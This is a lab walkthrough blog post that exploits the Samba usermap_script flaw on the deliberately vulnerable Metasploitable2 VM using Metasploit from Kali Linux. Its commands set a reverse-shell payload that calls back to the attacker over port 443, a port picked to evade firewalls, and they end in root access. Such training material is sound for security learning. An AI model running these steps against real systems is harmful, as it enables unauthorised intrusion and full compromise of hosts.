Metasploitable2: Hack Samba Server and get root access

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. For Instructions on how to install Metasploitable 2 Virtual Machine in KVM, refer to this post.

In a previous post , we carried out a Vulnerability Scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali LInux.  

In this post, we will hack Samba Server using Metasploit in Kali Linux.

We have the following scenario:

Metasploitable2 IP Address: 192.168.122.73
Kali Linux IP Address:           192.168.122.115

Perform the following steps on the Kali Linux machine:

1) We perform a port scan on the Metasploitable machine and see that the samba port is open.
root@kali:~# nmap  192.168.122.73
Nmap scan report for 192.168.122.73
Host is up (0.00080s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds


2) Start metasploit
root@kali:~# msfconsole
msf > search samba
 exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution


msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


msf exploit(usermap_script) > set RHOST 192.168.122.73
RHOST => 192.168.122.73


msf exploit(usermap_script) > show payloads


We will select a payload in which the remote host connects back to our (attacker) system.

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.122.73   yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.122.115  yes       The listen address
   LPORT  4444             yes       The listen port


Many corporate environments restrict outbound ports using a firewall. So we will use port 443, which is reserved for SSL traffic, and outbound is generally allowed.

msf exploit(usermap_script) > set LPORT 443
LPORT => 443
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ol88NmbSO30AG07L;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ol88NmbSO30AG07L\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.122.115:443 -> 192.168.122.73:46632) at 2015-06-13 14:35:45 +0530

whoami
root


We now have root access on the target machine